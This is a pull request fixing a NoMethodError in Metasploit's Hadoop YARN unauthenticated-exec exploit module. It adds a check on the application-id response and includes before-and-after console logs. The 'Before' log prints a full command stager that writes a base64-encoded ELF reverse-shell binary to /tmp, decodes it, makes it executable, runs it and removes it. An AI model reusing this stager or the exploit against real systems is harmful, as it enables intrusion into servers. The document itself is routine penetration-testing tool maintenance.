### PR TITLE
Fix #12156, NoMethodError in hadoop exploit.

### DIFF
--- a/modules/exploits/linux/http/hadoop_unauth_exec.rb
+++ b/modules/exploits/linux/http/hadoop_unauth_exec.rb
@@ -69,6 +69,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
       'method' => 'POST'
     )
+    unless res && res.code == 200 && res.body.include?('application-id')
+     fail_with(Failure::NotFound, 'Could not retrieve application-id')
+    end
 
     app_id = res.get_json_document['application-id']
 


### PR DESCRIPTION
Thanks to @wvu-r7 for this patch!
Fix #12156

## Before
```
msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.8.100:4444
[*] Sending Command
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgIZGgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/nuCXw.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/NJTbh' < '/tmp/nuCXw.b64' ; chmod +x '/tmp/NJTbh' ; '/tmp/NJTbh' ; rm -f '/tmp/NJTbh' ; rm -f '/tmp/nuCXw.b64'"]
[-] The connection timed out (12.4.3.2:8088).
[-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
[*] Exploit completed, but no session was created.
```

## After patch
```
msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 192.168.8.100:4444
[*] Sending Command
[-] Exploit aborted due to failure: not-found: Could not retrieve application-id
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/hadoop_unauth_exec) >
```